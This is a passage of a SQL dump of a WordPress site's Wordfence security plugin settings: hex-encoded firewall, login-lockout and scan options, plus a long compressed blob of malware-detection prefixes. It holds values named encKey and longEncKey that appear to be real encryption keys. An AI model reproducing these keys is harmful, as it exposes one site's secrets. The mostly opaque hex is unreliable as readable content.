133626163223b7d693a363b613a323a7b733a373a2269676e6f726543223b733a33323a223930363830373932646330643135626465613834386630303962303932623265223b733a373a2269676e6f726550223b733a33323a223930363830373932646330643135626465613834386630303962303932623265223b7d693a373b613a323a7b733a373a2269676e6f726543223b733a33323a223562343535363762363065613863336661623238356435333834626233643263223b733a373a2269676e6f726550223b733a33323a223562343535363762363065613863336661623238356435333834626233643263223b7d7d, 'yes'),
('email_summary_dashboard_widget_enabled', 0x31, 'yes'),
('email_summary_enabled', 0x31, 'yes'),
('email_summary_excluded_directories', 0x77702d636f6e74656e742f63616368652c77702d636f6e74656e742f77666c6f6773, 'yes'),
('email_summary_interval', 0x7765656b6c79, 'yes'),
('encKey', 0x39613434386131393163333239643666, 'yes'),
('fileContentsGSB6315Migration', 0x31, 'yes'),
('firewallEnabled', 0x31, 'yes'),
('geoIPVersionHash', 0x36313832376263643838356233663864306266313838356536663666396233376464343637363936626436363465623932383335303035326436363137306534, 'yes'),
('howGetIPs', '', 'yes'),
('howGetIPs_trusted_proxies', '', 'yes'),
('isPaid', '', 'yes'),
('keyType', 0x66726565, 'yes'),
('lastAttackDataSendTime', 0x313539363930363830322e393436353234, 'yes'),
('lastBlockAggregation', 0x31353936393037333430, 'yes'),
('lastBruteForceDataSendTime', 0x313539363931353633312e363038393030, 'yes'),
('lastDailyCron', 0x31353936393830363834, 'yes'),
('lastDashboardCheck', 0x31353936393830363835, 'yes'),
('lastEmailHash', 0x313539343731383035333a3064376363633131353661633738336435333835353536333430616233373834, 'yes'),
('lastFalsePositiveSendTime', 0x31353831383330313435, 'yes'),
('lastNotificationID', 0x353732, 'no'),
('lastPermissionsTemplateCheck', 0x31353937303234303934, 'yes'),
('lastScanCompleted', 0x6f6b, 'yes'),
('lastScanFailureType', '', 'yes'),
('lastScheduledScanStart', 0x31353936383830383938, 'yes'),
('liveActivityPauseEnabled', 0x31, 'yes'),
('liveTrafficEnabled', 0x30, 'yes'),
('liveTraf_displayExpandedRecords', 0x30, 'no'),
('liveTraf_ignoreIPs', '', 'yes'),
('liveTraf_ignorePublishers', 0x31, 'yes'),
('liveTraf_ignoreUA', '', 'yes'),
('liveTraf_ignoreUsers', '', 'yes'),
('liveTraf_maxAge', 0x3330, 'yes'),
('liveTraf_maxRows', 0x32303030, 'yes'),
('loginSecurityEnabled', 0x31, 'yes'),
('loginSec_blockAdminReg', 0x31, 'yes'),
('loginSec_breachPasswds', 0x61646d696e73, 'yes'),
('loginSec_breachPasswds_enabled', 0x31, 'yes'),
('loginSec_countFailMins', 0x31343430, 'yes'),
('loginSec_disableAuthorScan', 0x31, 'yes'),
('loginSec_disableOEmbedAuthor', 0x30, 'yes'),
('loginSec_enableSeparateTwoFactor', '', 'yes'),
('loginSec_lockInvalidUsers', 0x30, 'yes'),
('loginSec_lockoutMins', 0x3836343030, 'yes'),
('loginSec_maskLoginErrors', 0x31, 'yes'),
('loginSec_maxFailures', 0x33, 'yes'),
('loginSec_maxForgotPasswd', 0x33, 'yes'),
('loginSec_requireAdminTwoFactor', 0x30, 'yes'),
('loginSec_strongPasswds', 0x70756273, 'yes'),
('loginSec_strongPasswds_enabled', 0x31, 'yes'),
('loginSec_userBlacklist', '', 'yes'),
('longEncKey', 0x63363261353462336162613530653764376564373036383130343739353535376362376432653433346235383939323437616538613832633135363230653830, 'yes'),
('lowResourceScansEnabled', 0x30, 'yes'),
('lowResourceScanWaitStep', '', 'yes');
INSERT INTO `zdenl_wfconfig` (`name`, `val`, `autoload`) VALUES
('malwarePrefixes', 0x1f8b080000000000000314d6793815ef1700f0d997bbce9d3bcbbd7349594a85128a42522452491b25518a44d95a484a21492b11854a94a448918a94b469212a29a545452bd2267edfdf1f9fe79c799e79dfe79d33e7cc333ee3c78c8f0a1b6f3e5ed7df27cc5f7742d878b331e3754fbf1adeff20d525ef650d7fc93ff04543cbc42901a5b38e4dbe3e19edb2cd3829fbff7d96e375d784fa2d0f58ef17f6ffcb31666696e6ff6d030096e900f8fd0600dd7204e0613f00784737003fdb08a029fb01f40f0460919d00f6341dc003d60144c24b40dc620c480bbd0059ae2b20675a00b9701a90cfea04a89b8b00eadf154031b60c50748402f4a1068031380130e51500fb7636c0d9c8012e2002e0293b80f7be0cf0a7b401d5bc1a40559709a8d37b00758e03a0be2705d4cfee02c2cc0c40705f02088df68046bb11d05c710734b7c6005a2e3d80d6c25f80f6010d306818050cb2ea0306ed1c05e88cef027426d5033a418b8021b7ed005dfddf80eea40a4037e800a0fb623fa0679003e85dac010c96d90206db3b8061dc6c60d82c5bc030ec1060b8ed0c6078fd2c30fc603030bcaf011861150c8c987f0518f1ec246064bd03305aa70718555c008c3ecd058c4b3e01c6ef170326b62980c9e62fc0a85335c0e8bd2980193b0830079d01f315ad80057216b0d83d09189bbb111837eb3feeb1c0b8ebadc0b8ba1e605c431b6039de1cb02a580258d59080d5ef6460fcc97e608236054c88190b584bfe01d6975f03d657960236032460dbf714b0bbb8199874a61698742f1c983c2403709038020eb737028e4fd300a7fc12609a6d1f306d9d11e08219032e5621c0f4ddfd806b482ce01afd0c9811de04cc48f002669c7e0ccc78381d9839bd0f9895fc079875fa04e0367e0ee0968501b30b8e02eeab5c01f79fb9c05ca70660eec377c03cc73a605e731b309fb300162c3f002c487b0d2c38e3032c284e00165c59002cf89e03782cfe0778e4a6009e630b014fabd38067f62360a1bd2db0d07504e0a5ad05781d1e05789b7380b77f2fe05d98002cb925027c88eb800fe30bf86cbc0bf8aa30c0f710042cf5d4079659b703cbd6fe67d73860d9d705c0b21fd1809fec16e0e79e07f85df401fcea4381e5277600fe6bdc8000c92620604f2c10903a0958a998040426224060e7482068fa3420385a0c04c71603c11fdc81d5e07360f5de49c01a301358d3ba1908d99b038411414058501e1076b908082f360622b04a2062e91a20226b0058a7af02d6f53a03ebfdef001bb6860291975120f255051035640b10959d0f44475d00363d5d0c6c6e8d03b65886035b56c140ac2e0fc4064501b1ffbdbbd8241c88bdb706d8faf31db0f58f2eb02da901d8b6ef2cb0edf93b207ece6a203ee910109f4e02f175e78184b5f940428e239038ba1448dc3701487c3b06d8812e067684ac03929c2b8024970e2069873fb073e41320b92b0ad8f5ca09d88d2c01760734017b9097c01e6637b067eb6f60efa7fbc03ed97760dfc85e605fef4e607fad0790020c05523ce60129411b81d43dc9c0817105c0819752204df7369066300a48972f0032c64b800c673b20c36322903950041cb230010e256b80c3d3a280ece19940b6df442067df3d20e79e337064512170b4fd3470ac5901e4d6dc03f2c0ed40de7a7320efa31190d7e7069c70cd014e1afe020a8cf38182745fe054a30370aa5b0e1442b140a1f149a070fe6da0f0e11aa0b03d0428ec9e019c6ebb049c311a0c9c591a0c147bac028a977b0325274601e77ca600e72a5e02a5269dc0f99995c08529dac085ed89409905fc1f1e289b3208284f520217a3b380cba7aa80cb77260157dee600959360a0d26d3d50b93214a806d540f5f46b40f5460ba03af10c507d0103aed57c04aed7d901373a8601b586a380da53f780dadbe7805b395ac05d170cb81b7202a8d39900d4354702f7663600f77ce5c07d452470df7f1cf040bf1d789078187838fb32f0f0c42fa0c1341568b874047874f61bd038530e34a1cf80c763c380c7511dc0e347eec0139fa7c0b3cd5e40cbc536e079ec20e0053c1778616a04bcd8fb0d7869391978395909bcdc5e03bcac8f015e1d4b07da96ba016de962e0b5b73df03a240c789d3107783b7213f0f6b229d0ae6305b4af1c0dbc9fd0097c684b023a9dcc814f1b7c80cfbb75812fb6b3806f8ba281efe7a7025dcbf602ddc023a05bcffd3ff140f7c240a0fb880fd0e303013d8fed811f0dbf815f8514f0c7be13f89b550cfcfdb613e8bbf719f8376322f06f4e2930a01f0b824b1f80e0b54b20344d1f84f23f80d0a7fb201c7c128463bc40c4ba0c44f6ba8268bc2d88192f05312714c4fece0371ac05c49d868178d41090783604242fcd0445d62ea0c8eb38285a3b08141f5d0c8acba240f1071694406b40c9f0245032d9029486df05a55bdf8032bb6850f6753a48a5448354fb3390a6cb4066bf27c81e7b0cb2cdf92047a482dcba0650a589005516fb41555200a8d6ea05d50b9f80ea8be9a0fade7e50182d078545a9a0b06e38a89955036ae9a5815ac30e835af37c41adc64da0b67e21a8ed550b6a3ff90c6a3f7b050e2a9b0deae8e5833a9bb2419d9a2de0e0c0767070bc293844b3151ca25704ea5a3b81baaf1681fadbd340030f57d0c0f31f68f0f21938342d0b1c7a7109386ce930d070ae1434cc4e040d5f5b80c3d90de0703f1938bc580f1c1192048eb89c011a7d4d008d5d1241e3d93b41e315f1a009940f9ac8da4093100538aad1081cf5eb2e381a5c0b9a8e7d039a5a7f06cdc2ef80e6e020d0bcb70b1cebb3081c7b2a081c67701e1cb7620c38aeed006839763e68b9fb1e6899351bb49af81eb44a4e00c7e7e9831382fb406b991668bdfe0d687dc014b4feb901b419d903daec6c076d4e5e046dca0b41db6f45e0c42fe3403be77ed0ee55033869d13fd03e26149ccc2f06273f4f00a77c4440a74027705ad915d0d97a21e83cf91f383d87065d237e80331c678233a6478233350de0cc2b47c0598f6e806e1303c1d9f71e80ee0e5f41f79cb1e01cf0213817ae02e7ba5883f3f4d3c179451bc1f907eac1f9e913c0f9fffcc105ce11e082c80de0822425e8216f063d86ef043dea9f801ead96a067851fb870cf00b8f09c2fb8b07917b868ed417051e51ad04bb216f49ab412f43a52042eb6df032ebefc08f46e890497e4e783be7f8f824b3dd3c0a547b7824bf354e0b2046bd00ffe0cfa658d0657b864822bde4f02577ceb06fd375d07573ed805069ec6c1c0473018d8a205aeb23402575d1d0057dd580906ad1e040685e582c17b1130f8b51d18923f160c1b5e0b86bd58088675c780e123df821183ccc1889fb6e0daf521e0da4dafc0752b3e81ebaaf683eb6f9a83513e8fc1a833f6e046f834b8b1cb008c5e35098c3e9409467f3e066efaa107c65c5d06c63c20c1cd0d0a70f3d34c70f3ab19e0962b8de056663db875ba37b86dfa32705bea5770db897de0b60e27306e621718b7d91b8cb78c00e317f780f149d560c2922c703bbf074c6ca7c11d36a1e08e1b47c1a4582998d4dc0426af9c0a26a73f07777d4802f7f8b7827b7be682fbb48783fbe63d00f7dfaf07f77f2a0153977880a92d9fc0036519e081fb0360da912b60dafd7230eda90d983e68137870f54430e35b3d98e9e8021e2a70070f15e78187b75e00b3520bc06c551f98dd9e00e6841f0073fe8c068f319bc1632ff781b9935560ee2233f038150f1e5f520a1efff80ecc9b9800e6359e05f3fef681f9f7cbc0fc17ebc1133132b02079365890fa132cf8bb153cb57f0378eac339b0d0ec2a5858f71c2cf2990e16bd60c133254fc0b3b24de0592b73f0acbf083cbb26163cfbdb0d2c3630014b9840b0b430183cefb702bc306c0758c6f58365b933c08b4a1fb042b617ac30ab032be62e072bc2678397968480972937f0b267117879d545f08af15cf08ad748b012ab022bb71e01ab46458257bf8c05abc76f07afb93f04af453c07afcfd7056bf243c19a13ff397507bc11fd05ac35be03de1ef407bcbd2c10bc9daa0bdeaea9036ff706827775e78277875e04ebc6b8820fececc0078b96820f1227820f911fe0c3ffead0a0ef093e0a6a071f1db6001f7d71051b77a7838d3d916053bd3df8182d011feb0f031f7b28c027116fc1e60769e0b324026c91f5832d236780cfd716812fca08b0b59e025f9a24832f2fd482affc2bc057e73f80af9ee3e01b7500f8169c09be73b002dfb59581ef7aa783eff9b5e07b9b5ef043d211f063743cd8313c00ec18150c7694b9819de76dc04f4ed6e0a7d9d9e0a773cee0a7dba7c04f2febc1cf1e20f8b9a613fcf27e0bf855b418fc3e7d38f8bd580976c55d06bb3a10b0db580a76ef7b0ff644dd047bcb4e813fe331f0e7ef62f097d76ff0d7325ff057c076f057b60bf8ab7536f8fbc21af0ef1923f0efc30be03fc3f5e0bfb230b09fea05fb6b3bc081573b20c0938680340e02370543e0dd0608ec708620230708ba9d02c10a7b089e3000c176b6107ce71284901b21c46239842e790ca11f1d206cd70e08afba0811e68d10311e80886d232172fb2788bc1a0a919d0f21d1bc5848b22514923a2b21e9a9ab90f4c65b48661b08c9be5c80e453c590fc952d440d6985a8e3272185bb01a468d902293112526a2f8094772c20ceac05e293db21f50b3f4830fd0b0956472161bb0124ecf0853439af20ad774190f6345f48477b0ca4f34f020dd6de030df6748706873c8506df7b010df9f714d2cb9f07e97ddc0ee9bb7f87f457bc87f4776f84f4bf984043c7d641c3dc9e41c37c0741c3024aa16197bb20c3822bd0889635d0c8597268e4dd2390d1e41ac8e89f0a32ee2521131c8046692d86461b0c824627be834cdf3442636425d098112b20339f64c89c22a0b1ea5dd0d82de9d038e324c8b2702a6459c642561bbe40e327e943132c7420db1924641b6d06d94d5807d9139720fbc36b20fbecf3d014bb4590c31e06724851428e7353a0a969d990d30e0768daaaab90b3fb37c8b9f03be412e00fb96c9a00b9bc7f004d270643d3f90168fac52ec8d5b31e725d3d0572ddfa06727df21d9a352a049a3dfa24344fe886e65f3c092df8ef3c1eda43208f1124e44978419e735da185c23468e18403d0426f3368e13d105a347c3db4e8b12bb4e8cf53c8ab7627e4ed940379a75a434b3cc7414bb2e3a025d5ab219f21eb201feb78c8d77df27fbca1a5171a20bf9bdf20bf3777a0e587e2a0e54f66422bd60d402b631868e59e85d0cabbc3a1956f0f402b7f7b4381f6e95060c53b68153b065a35cd1b5ad5a48182dd1ba0e0221b68351f07ad76378556978742ab2f96436be0b9d01ad7155048d61828743a0485de5f02858df802857f64a008077f28c2e92114b1f73bb47ed41968fd520914f92c018a09358562726e419b8756429b2b3e415becef435b777c85e22c3da00449249430330f4ad8390025fc980a6db76a8612077f8112ab95d08e980128c9b41f4a9aec0e256dfd2faf1d0e25bdfa0a25075f87764db90aedbaf205da1d9d0ced71db0bedb9b40bdaf3c705da1f4f4129675f40292fdaa054712574c0e2159456980ba54f7c001d4cba031dcc18091dcc190a65b8c54199665950e6841028f3f114e8f0394fe870e779286b481e941d6b04e5f8e8434738057464690374e4d801e8c89312e82867041db3bb011d7b150e1dfb6b091d5fd20d1d3f7e1bcafbf812cab7cc80f2234740f91b0743f977d64327e05fd0098b9fd0099759d089b45bd0c91dafa102a8132ad85a0c9d6a7d0915ea044285cf1e4345880b54e4391e2ada3e032afa0941670a7e43c58af75071a8022ade3f032a29cc824a4e7f86ceb92aa07377e643a563caa0f39b70e87c9e3774fed454e882e832541e8041175799411733e4d0252f097405dc09554d5f0655bd7181ae6e5d0b5d4d9542d51147a06b0987a16ba7bf43359e15d00de3ef50ad47187473f763e896c14ce8b65801dded3900d5698ca03ad320e8de3a1ebad7ae07dd8fb0801ed01ba007babfa07ace17aa1f7f0e6a08190c3daa9b08356ef3861eb727424ffd1f40cdf7eba0e7cb40e8e5bf75501b770b6a33a2a0b62559d06bea0df47aca17e84dc67ae86d7215d4be391b7affc701fa10711efaf0d20bfaf06507d4916904750e9a0a757afd803ae3caa04fd75aa0cf7e4dd0979ae3d0d7f86fd0b7fd46d0f7d44ea8eb7206d4ed1e0975c7fc83ba93b5a0ee7b5fa11f6b73a1de337a506f5519f473d56de8176702fd6157417f3c52a03eed7bd0bf9e6ca8bf461beaefc361903485c1a97130947a1f866dfc60b8a60e46f49ec188d17518cb7782b1eb8760dc2612c61d2fc384f97298181b0e13ddcaffdc824960164ca696c1a29189b028bb0916b5b3b0b85b054b064d86252707c1d24bc9b0f4b1052c1b120acbf6bc8565b53f613a2a10a68f5f849546376065940c561604c2cad726304389604e910373898760d5e2cbb0ead7715858920e0bc5ceb0f074352c0c34c11afb6458b343026bafba070f9a1e0f0f3a2282757c26c13a6dc7e1c19b5078f0031c1eb27d3eacbbee21ac97d00beb5ddc03eb9b7bc243c515f0d0cafdf030e41f3cacdd1936743e080fef3c008f3498008f0c99041bdd390d1bbd0460a34f146c5c6b099b7cf7834dfe59c1a65e9eb0b924153677fe089b9f68852dfab6c056366b60aba445f0f8b80c787cc93dd8baf0036c531703db34bf846dfe36c2b61b5fc213ed52e089a515f0c49712d86ed33ed87eb0213c39bc0576887d013b5c34851d0d8fc053af6f85a79969c1d3aa5fc2d39e52b0b3ce28d879c20dd8b9e817ec423f865d7fa3f00c2a119ed171049e09fc82674ebc0dcff4308367666e8167c504c06e1b5260b7821df0eceb62d8fdcc01784eb0073cd75003cff33d03cf779c052fd8ac823d605d78a1d51578e1f63e78d1b9a1b057c93f78b1cb7d78f15b18f6d62e83977c74877d4624c1ff9510f671780dfbf430b0eff95078e9edddf0d20f43e1659a787859e56a7859d52bd84f6f1dec175509fbe519c0cbef0d82fd4bf561ff969db0ff670dbcd2d0005e5970120e1ceb0907da98c3816bffc1ab1acae0603e070edeb8145e3dea1dbce645101cb2e7171cf2cc170e9db5110e7d41c361e58e70d85b080e17e7c211f36de188b359f0baeec7f08692bb70a4b11d1c7931098eaca98623fb6fc351335de1a8c21638ea7410bc31f905bc31a501def8c012def8f11dbcc96c121cf3211f8ef99804c782d7e0d8dd1cbcf5cc3b785bc42878db36068e737900c78ff805c7572d80e35f5f81e33b86c3db1d6878c7919b70d2b4687827f011de193e15dee57611de23da02ef79f51dde3be938bcf7e306781f5f05ef7b5402ef1f49c0fba71c87530313e003b671f081056be003b943e003378be1345b0c4e5beb07a75f6e80d36f94c0e9cd5be083df0de00c73373863a5369cd1e506670e9a096766ac81b34b3ae19c15dbe123e14df091a33ef051a6153e7ac50f3e66b30e3eee4cc179471de0bceb1d70dea3f970fea0d7f009220a3e9170073ed1f71b3ea9df099ff41c059fbced06178c2c820b8e3bc2a74ed8c1855d59f0e9459be122e348f8ccb0a3f0d99a0cf8ec6d4bb8b82e1d2e59750e2ef939193eb772057cfed93cf802bf132e63cfc31553fec015910d70c5ed85f0957f2170956d115c75e6217cf5f431f85ae225b826672e7ca3ba0daea57fc2b5f1fd70edfe76f8e6fcc5f02d2303f8363217be636b08df716b83ebec9ec375178ce0ba2e73f89ed81dbe5765083ff471861f163c821f968c86eb6d40b83eda076e08d80637c46f811beee4c38fe256c34da35ae0c7a7d6c04f6699c0cdbbf5e0e6bf17e1671235fcdc7707fcbcd6137e51390e6e3d4cc02f3d9de0572bf5e157fd3fe1b6558ef01beb48f8ddd81ff0bbb85ef85df62df8dd7fdfab77bf0fc31f8936f8e35807f8e3d246b8f3aa3bdcf97e29fca96f08fc35782afcf5cd6ff8db4d67f8bb100677b172b8cbc30deeda6f0377bddb07773f36857b1af7c13ded73e11f31cbe11f1f0ec3bd3a91f0cfcbabe05fc323e05fbb27c1bf9dcce13f5e95f09f4b12f8efbc23f05fefcd707fe604b83f5b020f3cdd000fb49d86073ed82240cc6e04c83e8dc0d43704a91e8ba0536f2368ca10047d3d13c1a6ae44b0e5ed085e710721dd19443c390011df4e442413b72192e62f88b4520b91b93921b2e3b710aae626a2a84d44149db711da752442efff85d04fee234aee1ba29cfd1761914c847dd88a70d6c1086f9a8ef0475f20aa735710d5f54e449db11051e77f4704c5144478760ad1b2fb8e6845d7205a1dff106dcd4c44bba81ed16e5f87687f0d440689ae2083ae8e4774befd43747e352283a7a2c8e0c59d88de196f44efe31c44dfe015a2ff470b31f07b8818b44e46863eaa408621a98821ba02311c12850cff9a8f8c5c771d310a8e408cd69a22467de710e3117688f1c619c8e89fa688a97d1162dab80c19b3e2273266e03e62566582984b2620e65e6f100bc55dc4227527328ebc8c8c5b6a8a8c8b9a828cbb178f582a472396ad67112b750f62151d86d8e8a9101b8f18c4c6df09b125d29089757d88dd5c1764d2da61c8a4632b117b7b093265a11ee2e0f00871987b187128f5461ceb86214e3a8390699b61c4794307e2bc632ae27c3c05713ebf0c71be720b71397d1699ee3c04995ef50299fef90932a3a1059919d58accfcb91b9925139059aab9885ba837e2fe31089933fa1a32c7c50399bb6a2232f7421a32f7bd2932b7b71399a7fa81cc33b244e6efb987ccaf5a862cc819847884f8211e61258867e407c4731f83781e9b892cdcbe195904db215e95db116fac12f10ecd40bc0fd7234b6a5a11dfdc09c8527d4364e9fc55c8d2d84388dfda32c4ef6824e297678ef8f5be4196bf90202b4ede42fc555948802a1059d9bd0c095cf00509cc1e83049ef24602eb6d90559e3f9055d90c1234fe281214d08604c79d45824fff4256a7ee4556370f43d64cc4913547ed90100f0e09295882844e5b8f84d6a423e14b4124e2fa5a64ad6e06b26eee7364bd2219591f168bacbf54806c00ad9168f312243ae005125d71088971f64736f3e1c8962985c8b6c5c3916d29f39178d76a2401bf83242c5a8b24acfe8b24241f45b6139790edcd77901d374a9124d52c24e9920db273ac14d9b9f10f927cf11292dcc3227b9cbf217bc27590bd9357207b1d9e237b3f6d46f65d1f40f653cf90fdbf3e20fbff9920298bc62229be0c9212ab8da41a7f4552e7ce4352ef37220722ce2007de1423695bc620077510e4e0e4242473db78e4d0b8f1c861ab2ee470623392759f45b2bf3a20d9bd99c8117b0fe4e8debbc8d1131791a38fd5c8b1b2b348ee363de4f8040cc9e38621791b6291934a183979a11439596d8714a08dc869d145a468721372c6e1007226d50a3953f812396bf411393beb3372f6841b523ccd0e29d1ed454a9a2c90737d3c523aeb3752ea3e14b9509b8b94cda191b2a26748d9fd44a4aca118b938ae02b9b8e9057249e3845c1e3f1ab93c8f422ea70421575e6b2395a7ae209577e2902ac326a42ab013b93a611452bd2507b94e6d446a86af476ae26e23373a4a905aadf548edcb1348ed6f0be4a6a414b9d98e20b7a521c8ddd451485db931722f5b07b9f77b2772bf2d10a99f958a34d8f6238f8e55228dcd354893ed02a4299f471e7bc0c893d93791a77ba5c8d3de8548f39bf5c8b32c4ba465c824a4c5f931f2c2bf1e7979ab137945f8216de299489bf138a4edce1aa4ad6504f2264e1f796bf31379bbd61b7977c01c79d7ea81b44b3b90f6e2fd487b6d3ff21e3885bc0f4391f7e7f2900f5c13f2f1bffa76a43d443a5f94229f567c433ebdb3403e8338f219d242be2c5b867c29b442be9cad40be942e42becdfe867cfbd18cf414ff467eccfc8efc68d420bdf30390de8052a437cd06e92d9b8ffc347b85fc3e7a06f97da60ef9a35581fcf1ac40fe263b207d4ba448df330be41ff604e91fb209e95f700ce96fbb8a0cc01f9081bf9928f8fc270a75a5a3b03a0945eefaa0e8ca9b281af813456bd528ae744271c3fb28591c828a86af45c5a217a8d8b41995bc3f89caae4f44e50318aaa8aa429533da50462f0c653e6328db90877223bc508df7705473c20f1d6435031ddca841873c7e8bea8aca50dd712a54f7912faadb321fd5e3dfa07aeb1250bd9c5254aff137aa3f9546f503e5e8d0ecd9a8a141156a182d4287fb1c43470c4f478dcf01a849fa71d4e4aa133ae6f56cd44c50a266bbda51b3438b500b10422db6f7a2165d0c6af1e3353ab6ed223acec11e1d37f3226af91a40ad5cefa1566137d0f17b65e88495b9a83508a2d6cff6a1b663dd51db7d63d189c216d41e3e884edeb20b9d12c7a10eef7550c7994351c7eb3ae854cd67d469d578749acc059db63d1c75298c425dceb6a0d3b13274ba7a3deafa78153a4374189dc996a26ea59ea85b653b3a9b9880ce9e7a0e757f7b099d53a88dce8d5b8aceeb9a8cce0f7c8e2e30b98b7ab220eaa57b17f57a548e2ede3d0df5d192a33ebd45a86fe917d4f79d36bad4c50cf55b7215f56b8b4457348c45fdb3bea1fe17f6a1fecddbd09583fea12b3deea02b83607465af3eba8ada84ae4a6e44838df4d1d5a36fa0ab2f3ba22163d7a1a1de9bd1b00227347c472c1a9efb185d6bfe045d3fe82dba217802bae1a40f1a4938a31b87f7a01b27ef45370603e8c61a1e8d692e4237bbbc4537e7a3e8e62f31686c6339ba3565101ae72a47130c5fa109b153d0ed5f9dd0c42fbee88e5b53d19de13568f24c6334f9860b9adc254377c5d0e86e450dbadb3e03dd7de501ba376e1cba6fb716baff8b359aa2770c4d31b44053ce6d4253ae58a007a6dd420f1c53a307aedc47d31c9cd1b47d5568ba910b7a30568466ec7c8666eadd4033ffd5a2876c7cd1c323c3d0c31f0ad1ac317568d6add36856f30834670884e68c4d4073e222d09cec5834e765289af361247af464349abbad08cd2dd1458f0f9e88e6ad2846f3b296a1f93374d17cffbf687ef40334bfcd173d7104464ff4ed434fe66d400b580e2dd08e450bc6ac430b4ecc464fadaf424f7b7f464fbf3f8a16c724a32515fee805bdbde885c45af442fb30b44cf70d5ae6740b2d9b75042d2bfc8896d7eba317b7ad472ff765a157bea4a0959f5cd1cadeb7e8559dfde855fd0be8d5614e6835b408add67246ab2b07a3d50f6bd06b25cde8b57b8bd06b5fd5e8f5b7d5e8f59e58f486fc027ae362105a6bed80d6ae71426f528de8cdcb5ee8cdea7af476e428f4ce9aabe8bd1dade8bd7dade87d57157a3f26007d285b863e5c9d8b3e920b68a34912dad8618836fe89479bb8f568936d13da541e803e89c9479fc275e8538fa1e8331d107d566283b6ec94a22d7faea0cf77bd479f9f3982b6ae7a85bef4fd4f7222fab235087d35b6017d65dd87be5aff017dd5fe077d3dbe097d3deb11fafa5128da6e720e6d9ff41a6d7f6383be4f7445dfdfc8443f8cc9473b6c0cd00e472fb463f313b4e32c8976fa7d423f9fdf837efe3c0cfd121a877e69b046bf6a4d46bfea5f44bf15cd46bf9b8d46bb980d6897e607da75a702edbafb13edfac8a3dda39cd0ee437fd0ee73abd19ee20ef487c32fb4d7a50bfda50846ff74bc42fb82e6a2ffd6df43fb2153b47f540fda6fd68df647cd40fb33a6a3fd05f9e800528a81ad4f30a41ac5d0e10e18960e63587b1286fd8bc0f0f25f187e3f0d23ca5d30e2e63b8cac76c444f0794c6c9e84897dc230f1b26c4c62608749e2ce62b2957731d986fb98ec038051cc798c1e7113531aafc4b833328c2f3f8fa96a9e62aadf4e987af42d4c7dc40653b785619aae5398e64f0ca635ec18a6ade78269e70462da558b30edeb0998ce53736c886e13a67b2015d3830330bdd53f31bdbc5798ded74998c1c148cce0c8536c684222362c7e0d36ec5b1666185a8c0df72fc0865f988b8db02ac6460efb838dfc5b8d194fe6b0d135a1d8e82fa998a9d620ccb426011b63b20f1bb32f0f1b6bbe181b7be0133636331a1b5bfe171b67f2101bd7548159061ec02cc3f531cbda1c6cbcc94c6c7cad2d3661a4096633ee2f6633eb0366cbbfc26ced1b31dba8fff2f4e5d8c4e1bed824f60f36a9f4193669a01eb3d759894d5918804d29f981390499618e6d8ed8d46137b0a9a143b0698c1536ed863be692321173f94861ae3f82b119aac1d88c23a7b1593520e6260bc1dca863d8ecb86ecc9d73c1e6f4676273e52bb1b986fdd8dcdf9ed8bcd237d8bc6f3fb0f9191c36ff7129b600be852d68d7c53cc6f7611e73db31cfc53d98e7de139867c152ccf3b91ee6f9d6105bb8538579b107b1c5830f618b979ec1bcd31bb0253fdf603e8e4bb06583de61cb265dc0fc0c97622b7ab3b080210c1690f1070bc8fb8bad74de8dad7c35180b7c711f0b7c7b045b35651e1634f21d1694fd110b3a158405cb5cb1e067241642746121de13b190f2d758a80b8785be4cc0c2aaee60e1678cb088e1b3b108fb75d8ba0787b17503f1d886c7bdd886670fb10d5f9cb1c85dc658f488c358f4c9f55874713eb689dc846daa1b856d1e19806d4e388d6d3e7405dbfcc103dbb2db108b3d9a8ec5fef5c7b666cdc7e2f45ab0b8490d58bc781b16ff703d9610fd0b4ba8fe8c6d97e761db55fad8f62a05b6bde90696783b014becfd8025ddb7c376a69fc592c3596c179a8bed0e9462bba3706ccf9435d89ea7c5d8be1d9fb0d4496bb1d44c124b3d6983a5f62ec00e042760e9c3c3b0f4d8d158facd14ece0ef342c33780d7668f71becb0ee07ecb08f3f9665fa0ecbba6e8b6507ea62d969349663dc831db9f1043bca4ec18e2dcbc28ebd3a84e516a663b9979cb13c740496279d8ee5a9b66279770db07c682176e2bb183b09fec04eee1c8a15843fc20a1f4463a78f2dc08a74df6045ae7158d17f752eea26b133bae9d899e075d8d9e52c56ac4ac78a1d9bb0e22d2158c9a1a95849cf65ec5cff46ac74fc39acd4da012b9daec24add69acb4eabfbc2503bbf0448c951d75c2ca212556fedb10bb888fc12a6e0ec32afafdb04b5afdd8a56f5bb1cb7abad8952f065865d46eacea3b855db566b0ab3f6e60d56d4fb06b273762d70d0e63d797ba62d76f2ec1aeb70dc56a6213b09a3d7bb19abc07d80db755d80daf63d88d3b1dd88de6f9582d370dab7dff16bb997f05bbb5cd09bb5d3d04bbdb1f85d521fbb03acb5aecdef20bd8fd2519d8c3d1b558c3d0395883258435425fb127855d58739425f66c741df62c3c0b6bb95685b5fc32c75af99558ab3386b5fa9962adbba6632f5718622f2f4561afdf2dc7de305bb1b70137b177a79db0f7c867ec7d6f04d6c18dc23eb9ecc4be2ac5d8f7a1f558d7f46aac2b7b32d65d1381f5b82cc27e0c47b11febd2b01f5159d82f2c17fbb55c82fd8af881fd765a87fdb1e0b13f4e85d8dfd523b1bfef48ac6fcf42acafbd06fbf7e62cd6dfdc87033b1d71a0aa1f878efea7d000473cdc715cbf04274d27e3a203f771f109035c726b1b2ee5f7e0d29f5371caf61eae686ac259ad689cddd38a73959b7175d0465c28dd826b74d7e11a6319ae6d9d8a6bdfb6c1070535e23a13b6e03af3fd709d0d4a7cb09b193e64b4353e64c55b5cb75285ebf6f8e17adbbee17a7b9a70fdad36b87ee55ddce0f269dce0c9427c98f4023eccca171f56adc247740ec58de51db8717e156efcf5176e72743d3e2ae53c3eea44253efaee4ddcf4f24fdc7460e27f5d10848fe9388c9bd5bcc6cd877cc0cd6d10dcdce32c6ede6d885ba0f5f8d884707c6cea3b7c1c7a0ab73caec0ad8e4fc5ad6e98e3e37587e0e3973dc0c77738e11376afc227549fc76d6c6ee336b67ab8cdce5bb84d8d2d6ef3ad09b79d8de0135d37e376837a70bb0f77f1c9fdb6f894606b7c4afa4fdcc13f0777085b893b144dc11dbd0fe18e3b4d71c7230df8d498647c6a5a13eed4dd854fb3ba8d3bff0cc65db81bb84b9f0e3edd300f9f6eba1b9f99ee83cfcc30c56716aec367a145f8ac004f7c5677253e3bf81a3efba837ee6eb70c9fb7ec2c3effa235bec03e065fb0652feef1e903ee79b616f7ac5b8a2fb4d88f2f7cb60a5fe47108f77a108a7b7504e05e031adcdb301cf70e76c6bd2f56e13ec783719f4fc1b8efb24bf852a7367ce9fb